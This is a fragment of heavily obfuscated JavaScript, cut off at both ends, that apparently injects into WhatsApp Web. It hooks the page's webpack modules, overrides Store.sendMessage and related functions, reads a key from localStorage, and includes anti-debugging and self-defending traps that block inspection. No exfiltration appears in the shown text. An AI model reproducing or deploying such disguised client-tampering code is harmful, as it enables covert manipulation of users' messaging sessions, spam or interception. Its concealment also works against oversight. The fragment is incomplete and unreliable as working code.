_0x5a5f62=function(_0x14455c){this['VLtJsO']=_0x14455c,this['GXVQWg']=[-0x13a9+-0xc5*-0x17+-0x1*-0x1f7,0x892*-0x1+0x8*-0x199+0x155a,-0x154e+0x1a9d+-0x54f],this['zwwHyY']=function(){return'newState';},this['NnUoEN']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['QdSlFl']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x5a5f62['prototype']['qECsjT']=function(){const _0x3453bb=new RegExp(this['NnUoEN']+this['QdSlFl']),_0x33a736=_0x3453bb['test'](this['zwwHyY']['toString']())?--this['GXVQWg'][0xbe9+0x2055+-0x2c3d]:--this['GXVQWg'][-0x487+0xf41+-0xaba];return this['YpHtka'](_0x33a736);},_0x5a5f62['prototype']['YpHtka']=function(_0xd186b9){if(!Boolean(~_0xd186b9))return _0xd186b9;return this['HVFiSQ'](this['VLtJsO']);},_0x5a5f62['prototype']['HVFiSQ']=function(_0x50a4c0){for(let _0x42af7e=-0xf9c+-0x5*-0x6aa+-0x11b6,_0x5db0cc=this['GXVQWg']['length'];_0x42af7e&lt;_0x5db0cc;_0x42af7e++){this['GXVQWg']['push'](Math['round'](Math['random']())),_0x5db0cc=this['GXVQWg']['length'];}return _0x50a4c0(this['GXVQWg'][-0x1f45*0x1+-0x13d7+0x331c]);},new _0x5a5f62(_0x46f3)['qECsjT'](),_0x46f3['bSpFql']=!![];}_0x593154=_0x46f3['GwhfkC'](_0x593154,_0xb6a95),_0x455f8e[_0x2a6407]=_0x593154;}else _0x593154=_0xf7f8a8;return _0x593154;},_0x46f3(_0x455f8e,_0x4a07ce);}_0x373a1a[_0x264f1c(0x89e,'f*%b')+_0x264f1c(0x8a7,'htnj')+'ura'+'ble']=!(-0x2470+0x5e4+0x1e8d),_0x373a1a[_0x264f1c(0x4da,'gcm0')+_0x264f1c(0x544,'KR]L')+'le']=!(0x1ced+0x65*-0x61+0x1*0x959);const _0x4045e9={};_0x4045e9[_0x264f1c(0x85e,'gze&amp;')+_0x264f1c(0x656,'RRC%')+'ura'+'ble']=!(0x3*-0x925+-0x1b1c+0x368c),_0x4045e9[_0x264f1c(0x50f,'iiKT')+_0x264f1c(0x814,'htnj')+'le']=!(-0x997+0x23f2+-0xd2d*0x2),(Object[_0x264f1c(0x592,'5AE4')+_0x264f1c(0x798,'a0DP')](window[_0x264f1c(0x56e,'M6[c')+'I']),window['get'+'Con'+_0x264f1c(0x492,'lsS%')+'t']=!(0x2462+0xcfc+0x315d*-0x1),Object['def'+_0x264f1c(0x63b,'dogi')+_0x264f1c(0x86a,'OHp&amp;')+_0x264f1c(0x73a,'dogi')+'ty'](Store,_0x264f1c(0x425,'PWg1')+_0x264f1c(0x479,'CG*O')+_0x264f1c(0x6d6,'CG*O')+'t',_0x373a1a),window['sm2'+'id']||(Store[localStorage['WAB'+'row'+_0x264f1c(0x506,'NY1)')+'Id']]=Store[_0x264f1c(0x6ad,'I84y')+_0x264f1c(0x8b1,'jdCg')+_0x264f1c(0x628,'E]4x')+_0x264f1c(0x816,'I84y')+_0x264f1c(0x67d,'(B8Q')+'at'],Store['Sen'+_0x264f1c(0x648,'0bSR')+_0x264f1c(0x525,'BxG7')+_0x264f1c(0x64e,'Os%C')+_0x264f1c(0x583,'0bSR')+'at']=()=&gt;!(-0x1d34+-0x156f+0x1*0x32a4),console[_0x264f1c(0x74f,'BxG7')]('DEB'+_0x264f1c(0x4c5,'T0X#')+'\x203',window['Sto'+'re']),window[_0x264f1c(0x6fe,'XpZ4')+'re'][_0x264f1c(0x733,'U)fw')+_0x264f1c(0x87f,'Rtqj')+_0x264f1c(0x6cf,'OHp&amp;')+'ge']=function(_0x1eaea5){const _0x153d29={};_0x153d29[_0x4d220b(0x2f8,'%vt1')+'rZ']=function(_0x52a819,_0x1c00fc){return _0x52a819==_0x1c00fc;};function _0x4d220b(_0xa4a754,_0x581b00){return _0x264f1c(_0xa4a754- -0x53a,_0x581b00);}_0x153d29[_0x4d220b(0x1ab,'sZpr')+'gf']=function(_0x553aa6,_0x333143){return _0x553aa6!==_0x333143;};const _0x357940=_0x153d29;return!(!this['con'+_0x4d220b(-0x143,'4MFW')+'t'][_0x4d220b(0x1b1,'M6[c')+_0x4d220b(0x361,'sZpr')+'p']&amp;&amp;!this[_0x4d220b(0x15b,'(B8Q')+_0x4d220b(-0xa8,'lsS%')+'t'][_0x4d220b(-0x111,'83Uv')+'yCo'+'nta'+'ct']&amp;&amp;_0x357940['Nop'+'rZ'](-0x254d+0x3*-0xc37+0x49f2,(this[_0x4d220b(-0x122,'KR]L')+'s'][_0x4d220b(0x280,'(B8Q')+'els']||this[_0x4d220b(0x346,'5AE4')+'s'][_0x4d220b(-0xaf,'RRC%')+_0x4d220b(-0x3f,'Os%C')+'s'])['len'+_0x4d220b(-0xc7,'83Uv')])&amp;&amp;_0x357940[_0x4d220b(0x3b6,'f*%b')+'gf'](this[_0x4d220b(0x1a1,'$6*i')+_0x4d220b(0x247,'cSPR')+'t']['id'][_0x4d220b(0x1a5,'f*%b')+_0x4d220b(0x359,'y^Ni')+_0x4d220b(0x1e6,'NY1)')+'ed'],window[_0x4d220b(0x38b,'htnj')]()))&amp;&amp;window[_0x4d220b(0x1c4,'XpZ4')+'re'][localStorage['WAB'+_0x4d220b(0x24d,'vL&amp;G')+_0x4d220b(0xa0,'N9(d')+'Id']](this,...arguments);},Object[_0x264f1c(0x81c,'hJ6h')+_0x264f1c(0x898,'N9(d')+_0x264f1c(0x85c,'leZ3')+_0x264f1c(0x727,'jdCg')+'ty'](Store,'sen'+'dMe'+_0x264f1c(0x5ad,'(B8Q')+'ge',_0x4045e9)));if(!window['mR']){const e=function(){const _0x5a4888={'sZiSg':function(_0x237c32,_0x1790eb){return _0x237c32!=_0x1790eb;},'bBzqj':_0x3fbfa5('OHp&amp;',0x483)+_0x3fbfa5('jdCg',0x2d4)+'on','ICjlL':function(_0x1f5a82,_0x2a9d8d){return _0x1f5a82+_0x2a9d8d;},'JGguW':'fin'+_0x3fbfa5('4MFW',0x1fb)+_0x3fbfa5('f*%b',0x3a5)+_0x3fbfa5('a0DP',0x40f)+'an\x20'+'onl'+_0x3fbfa5('83Uv',0x451)+_0x3fbfa5('M6[c',0x4a2)+_0x3fbfa5('a0DP',0x2b6)+_0x3fbfa5('gze&amp;',0x3b4)+_0x3fbfa5('OHp&amp;',0x476)+_0x3fbfa5('BxG7',0x42e)+_0x3fbfa5('N4[D',0x132)+_0x3fbfa5('htnj',0xf4)+_0x3fbfa5('RRC%',0x82)+_0x3fbfa5('7Z9M',0xab)+',\x20','YWBar':_0x3fbfa5('T0X#',0x1a5)+_0x3fbfa5('U)fw',0x15d)+_0x3fbfa5('f*%b',0x101)+'ed','YxBdr':function(_0x310f34,_0x17cd73){return _0x310f34(_0x17cd73);},'llGfW':'und'+'efi'+_0x3fbfa5('Rtqj',0x45b),'HsBdJ':function(_0x19f92a,_0x5c4bb0){return _0x19f92a==_0x5c4bb0;},'dfLtK':_0x3fbfa5('4MFW',0x320)+_0x3fbfa5('h$BM',0x3d0),'fwMoE':_0x3fbfa5('XpZ4',0x309)+_0x3fbfa5('cSPR',0xe2),'iGgcu':function(_0xff639a,_0xe55b39){return _0xff639a!==_0xe55b39;},'UBBmx':_0x3fbfa5('U0Jr',0x198)+'fc','enBug':function(_0x1d8d44,_0x18ba7b){return _0x1d8d44!==_0x18ba7b;},'sKBZF':_0x3fbfa5('dogi',0x439)+'eH','IkNPv':'aRb'+'Sv','hPysu':function(_0x513b7c){return _0x513b7c();},'BueUP':function(_0x5974ee,_0x2d7302){return _0x5974ee!==_0x2d7302;},'ZgdPi':_0x3fbfa5('$mkU',0x41)+'zy','mjnce':_0x3fbfa5('7Z9M',0x341)+'zq','VUePb':function(_0x7bad8f,_0x1f3f1f){return _0x7bad8f===_0x1f3f1f;},'MGfNS':_0x3fbfa5('0bSR',0x1e9)+'qA','pDQJA':function(_0x3e6c65,_0x1e5921){return _0x3e6c65+_0x1e5921;},'YmVFc':_0x3fbfa5('hJ6h',0x5d)+'u','bHbpy':_0x3fbfa5('$6*i',0x2c0)+'r','XTehm':_0x3fbfa5('sZpr',0x3a0)+'teO'+_0x3fbfa5('cSPR',0xba)+'ct','luHZV':'WQO'+'JW','RHLhz':_0x3fbfa5('sZpr',0x13b)+'LB','QTMGF':_0x3fbfa5('PWg1',0x288)+_0x3fbfa5('KR]L',0x333)+_0x3fbfa5('f*%b',0x61)+_0x3fbfa5('Rcey',0x16a)+_0x3fbfa5('(B8Q',0x2c8)+')','PoPbe':_0x3fbfa5('cSPR',0x116)+'+\x20*'+_0x3fbfa5('htnj',0x10)+_0x3fbfa5('iiKT',0x31b)+_0x3fbfa5('M6[c',0x49f)+_0x3fbfa5('Rtqj',0xbf)+_0x3fbfa5('N9(d',0x3c4)+'-9a'+_0x3fbfa5('y^Ni',0x4b8)+_0x3fbfa5('kt3x',0x368)+'$]*'+')','AILCP':function(_0x31c6f0,_0x4a839c){return _0x31c6f0(_0x4a839c);},'GKwog':_0x3fbfa5('leZ3',0xfe)+'t','Rutup':function(_0x3837c0,_0x499ab2){return _0x3837c0+_0x499ab2;},'kcpva':'cha'+'in','Klgxf':'inp'+'ut','AopKS':_0x3fbfa5('CG*O',0x2e1)+'Rm','MHsLg':'ALy'+'ZY','nuYUy':function(_0x231525){return _0x231525();},'DykBB':function(_0x2b58d3,_0x1d62b5){return _0x2b58d3!==_0x1d62b5;},'UpGWb':_0x3fbfa5('0bSR',0x1ca)+'NY','JpuUr':function(_0x110f16,_0x41a018,_0x55ad77){return _0x110f16(_0x41a018,_0x55ad77);},'GPGdv':function(_0x4d3d04,_0x45346f){return _0x4d3d04!==_0x45346f;},'XCLsf':_0x3fbfa5(')u7k',0x77)+'vJ','iTbOJ':_0x3fbfa5('7Z9M',0x3b3)+_0x3fbfa5('h$BM',0x4c0)+'(tr'+_0x3fbfa5('N9(d',0x1f9)+'\x20{}','ZwqhA':_0x3fbfa5('Rtqj',0x221)+'nte'+'r','omcks':_0x3fbfa5('83Uv',0x43d)+'lN','Biwol':_0x3fbfa5('83Uv',0x16b)+'AC','LKfcl':_0x3fbfa5('bnZi',0x197)+'Js','ZeRWv':_0x3fbfa5('jdCg',0x3b2)+'PQ','NPEXr':function(_0x3e48b5,_0x53b0ad){return _0x3e48b5!==_0x53b0ad;},'hIAdR':_0x3fbfa5('N4[D',0x40b)+'FG','LIfso':_0x3fbfa5('h$BM',0x107)+'CD','Qhxta':function(_0x41ef3b,_0x4662ea){return _0x41ef3b==_0x4662ea;},'BJsmL':function(_0xe8a12f,_0x3b3e46){return _0xe8a12f==_0x3b3e46;},'sDWRq':function(_0x4faa6a,_0x577fed){return _0x4faa6a+_0x577fed;},'zghce':_0x3fbfa5('N9(d',0x319)+'ion','QcOqT':_0x3fbfa5('y^Ni',0x1a)+'Jc','xGocm':function(_0xb77b45,_0x52e5a){return _0xb77b45!=_0x52e5a;},'OhbFf':function(_0x3bbd7d,_0x65c95f){return _0x3bbd7d==_0x65c95f;},'hmdDD':function(_0x2f0e3d,_0x3fbe15){return _0x2f0e3d!==_0x3fbe15;},'QpUIu':_0x3fbfa5('$mkU',0x3ac)+'uf','Rjtuy':_0x3fbfa5('f*%b',0x2b4)+'cw','Pmdyz':'mgH'+'jl','jTwdn':function(_0x2528dc,_0x5dabbd){return _0x2528dc+_0x5dabbd;},'gOfbY':function(_0x5e4a12,_0x1d1d40){return _0x5e4a12(_0x1d1d40);},'leHdB':_0x3fbfa5('$6*i',0x470)+'IJ'},_0x2c6f35=(function(){const _0x5e7016={'DFIuQ':function(_0x31885e,_0x1ad63c){function _0x4c27b3(_0xb969c7,_0x131c23){return _0x46f3(_0x131c23- -0xa2,_0xb969c7);}return _0x5a4888[_0x4c27b3('N4[D',0x4c1)+'Sg'](_0x31885e,_0x1ad63c);},'rnTgO':_0x5a4888[_0x5626f2(0x88d,'h$BM')+'fW'],'EUflo':function(_0xbfed98,_0x4b99f7){function _0x260072(_0x59eaae,_0x116ec8){return _0x5626f2(_0x59eaae- -0xbc,_0x116ec8);}return _0x5a4888[_0x260072(0x5ba,'h$BM')+'dJ'](_0xbfed98,_0x4b99f7);},'ZUhRx':_0x5a4888[_0x5626f2(0x88c,'lsS%')+'tK'],'wneUq':_0x5a4888['fwM'+'oE'],'GTTdb':function(_0x2ecd59,_0x1f4c7e){return _0x5a4888['HsB'+'dJ'](_0x2ecd59,_0x1f4c7e);},'aUpXV':_0x5a4888['bBz'+'qj'],'NBjDr':function(_0x46bccd,_0x2c2723){return _0x5a4888['ICj'+'lL'](_0x46bccd,_0x2c2723);},'LeNSS':_0x5a4888['JGg'+'uW'],'JvYJm':_0x5a4888[_0x5626f2(0x57d,'KR]L')+'ar'],'dvfDU':function(_0xb15e82,_0x3e2e77){function _0x4ce997(_0x5d2d1b,_0x3d0b6d){return _0x5626f2(_0x5d2d1b- -0x367,_0x3d0b6d);}return _0x5a4888[_0x4ce997(0x1aa,'I84y')+'dr'](_0xb15e82,_0x3e2e77);},'uCVxv':function(_0x108821,_0x27eee0){return _0x5a4888['iGg'+'cu'](_0x108821,_0x27eee0);},'IRLgV':_0x5a4888['UBB'+'mx'],'SxbOj':function(_0x377809,_0x3da070){return _0x5a4888['enB'+'ug'](_0x377809,_0x3da070);},'LkmDt':_0x5a4888[_0x5626f2(0x777,'I84y')+'ZF'],'uHSeP':_0x5a4888[_0x5626f2(0x580,'leZ3')+'Pv'],'QxGhu':function(_0x419f0b){function _0x2df42e(_0x4fc674,_0x348eef){return _0x5626f2(_0x4fc674- -0x1ea,_0x348eef);}return _0x5a4888[_0x2df42e(0x63d,'1%oo')+'su'](_0x419f0b);},'sKPvG':function(_0x8b7b8b,_0x264fa7){function _0x154d7d(_0x1d29ce,_0xea47eb){return _0x5626f2(_0xea47eb- -0x561,_0x1d29ce);}return _0x5a4888[_0x154d7d('RRC%',-0x14a)+'UP'](_0x8b7b8b,_0x264fa7);},'nlAAh':_0x5a4888[_0x5626f2(0x4bb,'CJbF')+'Pi'],'BFWEP':_0x5a4888[_0x5626f2(0x534,'vL&amp;G')+'ce']};function _0x5626f2(_0x48af70,_0x466480){return _0x3fbfa5(_0x466480,_0x48af70-0x471);}if(_0x5a4888['VUe'+'Pb'](_0x5a4888[_0x5626f2(0x631,'0bSR')+'NS'],_0x5a4888[_0x5626f2(0x4c9,'Os%C')+'NS'])){let _0x7c0166=!![];return function(_0x31740d,_0x267e8f){const _0x7ffd19={'iJVBw':function(_0x1d44d1){function _0x3ab511(_0x30384e,_0x104722){return _0x46f3(_0x30384e-0x108,_0x104722);}return _0x5e7016[_0x3ab511(0x686,'BxG7')+'hu'](_0x1d44d1);}};function _0x2e02b3(_0x17de31,_0x3eb348){return _0x5626f2(_0x3eb348- -0x4eb,_0x17de31);}if(_0x5e7016[_0x2e02b3('kt3x',0xb5)+'vG'](_0x5e7016[_0x2e02b3('cSPR',0x31f)+'Ah'],_0x5e7016[_0x2e02b3('CJbF',0x14)+'EP'])){const _0x4ae1f5=_0x7c0166?function(){const _0x4b054b={'eXKyp':function(_0x3099d6,_0x28f563){return _0x5e7016['DFI'+'uQ'](_0x3099d6,_0x28f563);},'tkxXZ':_0x5e7016[_0xfc0e7d(0x206,'CJbF')+'gO'],'IHZwH':function(_0x753ee6,_0x35ecc3){function _0x410103(_0x213a5e,_0x3a5d35){return _0xfc0e7d(_0x3a5d35-0x497,_0x213a5e);}return _0x5e7016[_0x410103('htnj',0x66a)+'lo'](_0x753ee6,_0x35ecc3);},'uTzbi':_0x5e7016['ZUh'+'Rx'],'ARfAJ':_0x5e7016[_0xfc0e7d(-0x173,'leZ3')+'Uq'],'hCXRl':function(_0x5d0d07,_0x107483){function _0x501182(_0x193c06,_0x3d0dc0){return _0xfc0e7d(_0x3d0dc0- -0x83,_0x193c06);}return _0x5e7016[_0x501182('5AE4',0x141)+'db'](_0x5d0d07,_0x107483);},'UGjkF':function(_0x5dc068,_0x125fff){return _0x5e7016['EUf'+'lo'](_0x5dc068,_0x125fff);},'RUXYY':_0x5e7016[_0xfc0e7d(0x111,'XpZ4')+'XV'],'HtGIW':function(_0x253b8d,_0x4ee74a){return _0x5e7016['NBj'+'Dr'](_0x253b8d,_0x4ee74a);},'yhOQH':_0x5e7016[_0xfc0e7d(0x338,'4MFW')+'SS'],'oIoVC':_0x5e7016['JvY'+'Jm'],'aztRr':function(_0x320b65,_0xf990ee){function _0x5ae364(_0x52a77b,_0x290c72){return _0xfc0e7d(_0x52a77b-0x2c2,_0x290c72);}return _0x5e7016[_0x5ae364(0x334,'dogi')+'DU'](_0x320b65,_0xf990ee);}};function _0xfc0e7d(_0x1b05db,_0x33194b){return _0x2e02b3(_0x33194b,_0x1b05db- -0xfc);}if(_0x5e7016[_0xfc0e7d(0x104,'KR]L')+'xv'](_0x5e7016[_0xfc0e7d(-0x17a,'$6*i')+'gV'],_0x5e7016[_0xfc0e7d(0x7,'E]4x')+'gV'])){if(_0x2401bc=_0x5a5f62[_0xfc0e7d(-0x141,'gcm0')+'j'][_0x14455c],_0x4b054b['eXK'+'yp'](_0x4b054b[_0xfc0e7d(-0x108,'I84y')+'XZ'],typeof _0x3453bb)){if(_0x4b054b[_0xfc0e7d(-0xa3,'gze&amp;')+'wH'](_0x4b054b[_0xfc0e7d(0x9a,'h$BM')+'bi'],typeof _0x33a736)){if(_0x4b054b[_0xfc0e7d(-0x8c,'leZ3')+'wH'](_0x4b054b['ARf'+'AJ'],typeof _0x4b2b13['def'+'aul'+'t'])){for(_0x4716cd in _0x38e014['def'+_0xfc0e7d(0x77,'bnZi')+'t'])_0x4b054b['hCX'+'Rl'](_0x383532,_0x5554ec)&amp;&amp;_0x7c4d26[_0xfc0e7d(0x103,'vL&amp;G')+'h'](_0x13fe88);}for(_0x2d6fef in _0x31cd19)_0x4b054b[_0xfc0e7d(0x31a,'KR]L')+'kF'](_0x122d61,_0x115539)&amp;&amp;_0x5655e4[_0xfc0e7d(0x31c,'NY1)')+'h'](_0x50faca);}else{if(_0x4b054b['eXK'+'yp'](_0x4b054b['RUX'+'YY'],typeof _0x983e37))throw new _0x50b61e(_0x4b054b['HtG'+'IW'](_0x4b054b[_0xfc0e7d(-0x162,'kt3x')+'IW'](_0x4b054b[_0xfc0e7d(0x24d,'M6[c')+'QH'],typeof _0x54fdce),_0x4b054b[_0xfc0e7d(-0x12b,'NY1)')+'VC']));_0x4b054b['azt'+'Rr'](_0x56bff2,_0x351309)&amp;&amp;_0x35ba27[_0xfc0e7d(0x349,'U)fw')+'h'](_0xc44582);}}}else{if(_0x267e8f){if(_0x5e7016['Sxb'+'Oj'](_0x5e7016[_0xfc0e7d(-0x17b,'Os%C')+'Dt'],_0x5e7016[_0xfc0e7d(-0xf,'dogi')+'eP'])){const _0x5253e1=_0x267e8f[_0xfc0e7d(0x1ef,'Rtqj')+'ly'](_0x31740d,arguments);return _0x267e8f=null,_0x5253e1;}else{if(_0x3ce23e)return _0x504a5c;else wbuGxn[_0xfc0e7d(-0x9b,'sZpr')+'Rr'](_0x2a869c,0x439+0x19b*0xa+-0x1447);}}}}:function(){};return _0x7c0166=![],_0x4ae1f5;}else joVjPu[_0x2e02b3('BxG7',0x456)+'Bw'](_0xae10b3);};}else{if(_0x5a4888['sZi'+'Sg'](_0x5a4888[_0x5626f2(0x6a1,'hJ6h')+'qj'],typeof _0x172817))throw new _0x4db532(_0x5a4888['ICj'+'lL'](_0x5a4888['ICj'+'lL'](_0x5a4888[_0x5626f2(0x5df,'ddxB')+'uW'],typeof _0x54e19c),_0x5a4888['YWB'+'ar']));_0x5a4888[_0x5626f2(0x8d3,'(B8Q')+'dr'](_0x50f68f,_0xe8c324)&amp;&amp;_0x27465a[_0x5626f2(0x64d,'jdCg')+'h'](_0x2298a1);}}());function _0x3fbfa5(_0x1ad081,_0x24c401){return _0x264f1c(_0x24c401- -0x42c,_0x1ad081);}return(function(){const _0x16b3c4={'DWPcu':function(_0x113278,_0x347799){return _0x5a4888['YxB'+'dr'](_0x113278,_0x347799);},'OSKSH':function(_0x5b6ba5,_0xa3a61a){function _0x501dc2(_0x351c94,_0x213d18){return _0x46f3(_0x351c94- -0x215,_0x213d18);}return _0x5a4888[_0x501dc2(0x437,'ddxB')+'Pb'](_0x5b6ba5,_0xa3a61a);},'CxBvB':_0x5a4888['luH'+'ZV'],'JAXCB':_0x5a4888[_0x444fae(0x9ae,'XpZ4')+'hz'],'yWVBY':_0x5a4888[_0x444fae(0x4d3,'jdCg')+'GF'],'dOYQe':_0x5a4888[_0x444fae(0x841,'OHp&amp;')+'be'],'uAQpA':function(_0x28ec1b,_0x244e42){return _0x5a4888['AIL'+'CP'](_0x28ec1b,_0x244e42);},'LRjZw':_0x5a4888[_0x444fae(0x64f,'NY1)')+'og'],'vqIqN':function(_0x459b22,_0xda5692){return _0x5a4888['Rut'+'up'](_0x459b22,_0xda5692);},'YHhkz':_0x5a4888[_0x444fae(0x4ef,'ddxB')+'va'],'WrpGd':function(_0x4d29bd,_0x571642){function _0x47f68a(_0x52797c,_0x89f5cb){return _0x444fae(_0x89f5cb- -0x4c3,_0x52797c);}return _0x5a4888[_0x47f68a('U0Jr',0x39a)+'JA'](_0x4d29bd,_0x571642);},'RqTRv':_0x5a4888[_0x444fae(0x675,'7Z9M')+'xf'],'gqnXA':function(_0x40ecda,_0x6809e1){function _0x481f33(_0x31188b,_0x40837c){return _0x444fae(_0x40837c- -0x678,_0x31188b);}return _0x5a4888[_0x481f33('CJbF',-0xee)+'cu'](_0x40ecda,_0x6809e1);},'JpkMh':_0x5a4888[_0x444fae(0x7b9,'U)fw')+'KS'],'TtbHx':function(_0x24c7f1,_0x140fa0){function _0x5a67df(_0x3ed542,_0x53fd64){return _0x444fae(_0x53fd64- -0x4df,_0x3ed542);}return _0x5a4888[_0x5a67df('f*%b',0x69)+'Pb'](_0x24c7f1,_0x140fa0);},'uSknW':_0x5a4888[_0x444fae(0x7f7,'lsS%')+'Lg'],'RJIVV':function(_0x675d06){function _0x2c5692(_0x15fb6a,_0x11e152){return _0x444fae(_0x11e152- -0x58,_0x15fb6a);}return _0x5a4888[_0x2c5692('lsS%',0x550)+'Uy'](_0x675d06);}};function _0x444fae(_0x684fc5,_0x4f5bfb){return _0x3fbfa5(_0x4f5bfb,_0x684fc5-0x4ff);}_0x5a4888[_0x444fae(0x87c,'lsS%')+'BB'](_0x5a4888[_0x444fae(0x6c1,'a0DP')+'Wb'],_0x5a4888['UpG'+'Wb'])?function(){return![];}[_0x444fae(0x6fc,'kt3x')+_0x444fae(0x592,'cSPR')+_0x444fae(0x879,'$6*i')+'or'](sWvcgw[_0x444fae(0x7ff,'h$BM')+'JA'](sWvcgw[_0x444fae(0x909,'BxG7')+'Fc'],sWvcgw['bHb'+'py']))[_0x444fae(0x5e8,'f*%b')+'ly'](sWvcgw[_0x444fae(0x80e,'KR]L')+'hm']):_0x5a4888[_0x444fae(0x4c9,'0bSR')+'Ur'](_0x2c6f35,this,function(){function _0x3ea05c(_0x50b65d,_0x1c6680){return _0x444fae(_0x50b65d- -0x721,_0x1c6680);}if(_0x16b3c4['OSK'+'SH'](_0x16b3c4[_0x3ea05c(-0x18d,'f*%b')+'vB'],_0x16b3c4['JAX'+'CB']))GTueAK['DWP'+'cu'](_0x1b5445,-0x1845+0xce8+-0xb5d*-0x1);else{const _0x4e3cba=new RegExp(_0x16b3c4[_0x3ea05c(-0x12a,'5AE4')+'BY']),_0x38a5d9=new RegExp(_0x16b3c4[_0x3ea05c(-0x162,'0bSR')+'Qe'],'i'),_0xda5563=_0x16b3c4[_0x3ea05c(0x125,'Os%C')+'pA'](_0x4818f7,_0x16b3c4[_0x3ea05c(0x42,')u7k')+'Zw']);if(!_0x4e3cba['tes'+'t'](_0x16b3c4['vqI'+'qN'](_0xda5563,_0x16b3c4[_0x3ea05c(0x129,'$mkU')+'kz']))||!_0x38a5d9[_0x3ea05c(-0xe2,')u7k')+'t'](_0x16b3c4[_0x3ea05c(0xd7,'$mkU')+'Gd'](_0xda5563,_0x16b3c4[_0x3ea05c(0x1e7,'N4[D')+'Rv']))){if(_0x16b3c4['gqn'+'XA'](_0x16b3c4['Jpk'+'Mh'],_0x16b3c4[_0x3ea05c(-0x53,'N4[D')+'Mh'])){if(_0x53647f){const _0x15f624=_0x226985['app'+'ly'](_0x587a11,arguments);return _0x2f2366=null,_0x15f624;}}else _0x16b3c4['DWP'+'cu'](_0xda5563,'0');}else{if(_0x16b3c4[_0x3ea05c(0x25,'T0X#')+'Hx'](_0x16b3c4[_0x3ea05c(0x1f1,'KR]L')+'nW'],_0x16b3c4[_0x3ea05c(-0x22,'lsS%')+'nW']))_0x16b3c4[_0x3ea05c(0x135,'I84y')+'VV'](_0x4818f7);else{if(_0x289962){const _0x36bb4d=_0xf5b7f3[_0x3ea05c(0x74,'Os%C')+'ly'](_0x45b077,arguments);return _0x1ae9ef=null,_0x36bb4d;}}}}})();}()),(e[_0x3fbfa5('$mkU',0x2b5)]=Math[_0x3fbfa5('0bSR',0x1da)+_0x3fbfa5('gze&amp;',0x1d5)]()['toS'+'tri'+'ng'](-0x243b+-0x1e93+-0x30b*-0x16)[_0x3fbfa5('4MFW',0x32c)+_0x3fbfa5('dogi',0x405)+_0x3fbfa5('leZ3',0x34d)](0x13a6*0x1+0x2270+0x360f*-0x1),e[_0x3fbfa5('leZ3',0x417)+'j']={},fillModuleArray=function(){function _0x11478b(_0x3eb8c5,_0x28b2d9){return _0x3fbfa5(_0x3eb8c5,_0x28b2d9-0x153);}const _0x1a0468={'zYJUc':function(_0x202a0a,_0x2b5c60){function _0x2e6bd7(_0x2a07e3,_0x4dca7b){return _0x46f3(_0x2a07e3-0x18,_0x4dca7b);}return _0x5a4888[_0x2e6bd7(0x578,'cSPR')+'dv'](_0x202a0a,_0x2b5c60);},'VUPci':_0x5a4888[_0x11478b('OHp&amp;',0x2f1)+'sf'],'EXlhk':function(_0x3d02bb,_0x40d7f0){function _0x50c84d(_0x572213,_0x17880a){return _0x11478b(_0x572213,_0x17880a-0x1d2);}return _0x5a4888[_0x50c84d('leZ3',0x596)+'dr'](_0x3d02bb,_0x40d7f0);},'hkfxw':_0x5a4888[_0x11478b('1%oo',0x112)+'OJ'],'FymWR':_0x5a4888[_0x11478b('1%oo',0x52c)+'hA'],'GrVNv':function(_0x3c7e5d,_0x2ba444){function _0x1a847a(_0x143153,_0x20dfb2){return _0x11478b(_0x143153,_0x20dfb2- -0x39b);}return _0x5a4888[_0x1a847a('0bSR',-0x20c)+'Pb'](_0x3c7e5d,_0x2ba444);},'UWQDY':_0x5a4888[_0x11478b('dogi',0x52b)+'ks'],'QQXVp':_0x5a4888[_0x11478b('dogi',0x421)+'ol']};if(_0x5a4888[_0x11478b('T0X#',0x3ec)+'BB'](_0x5a4888[_0x11478b('kt3x',0x1c2)+'cl'],_0x5a4888['ZeR'+'Wv']))(window['web'+'pac'+_0x11478b('Rtqj',0x469)+_0x11478b('M6[c',0x3b2)+_0x11478b(')u7k',0x3ac)+'ld']||window[_0x11478b('%vt1',0x223)+_0x11478b('$6*i',0x514)+_0x11478b('y^Ni',0x4e3)+_0x11478b('5AE4',0x43a)+_0x11478b('0bSR',0x415)+_0x11478b('OHp&amp;',0x38a)+_0x11478b('I84y',0x296)+'web'+_0x11478b('CJbF',0x3bf)+_0x11478b('y^Ni',0x124)+'t'])['pus'+'h']([[e[_0x11478b('U)fw',0x424)]],{},function(_0x1530a3){function _0x306dfa(_0x25845d,_0x5320d5){return _0x11478b(_0x25845d,_0x5320d5- -0x36f);}const _0x2da083={};_0x2da083['IAU'+'uh']=_0x1a0468[_0x306dfa('a0DP',-0x153)+'xw'],_0x2da083[_0x306dfa('M6[c',0x101)+'JJ']=_0x1a0468[_0x306dfa('NY1)',0x133)+'WR'];const _0x34ce77=_0x2da083;if(_0x1a0468[_0x306dfa('7Z9M',-0xc4)+'Nv'](_0x1a0468['UWQ'+'DY'],_0x1a0468[_0x306dfa('PWg1',-0xd3)+'Vp']))return![];else Object[_0x306dfa('M6[c',0x3b)+'s'](_0x1530a3['m'])[_0x306dfa('0bSR',0x1e3)+_0x306dfa('$6*i',0xba)+'h'](function(_0x7e9b92){function _0x2b05ee(_0x3fe77a,_0x5c5410){return _0x306dfa(_0x3fe77a,_0x5c5410-0x163);}if(_0x1a0468[_0x2b05ee('7Z9M',0x72)+'Uc'](_0x1a0468['VUP'+'ci'],_0x1a0468['VUP'+'ci']))return function(_0xebdebf){}['con'+_0x2b05ee('h$BM',-0x73)+_0x2b05ee('y^Ni',0x409)+'or'](jUwAuW[_0x2b05ee('U0Jr',0x104)+'uh'])[_0x2b05ee(')u7k',0x37c)+'ly'](jUwAuW[_0x2b05ee('ddxB',0x29f)+'JJ']);else e[_0x2b05ee('T0X#',0x2aa)+'j'][_0x7e9b92]=_0x1a0468['EXl'+'hk'](_0x1530a3,_0x7e9b92);});}]);else{let 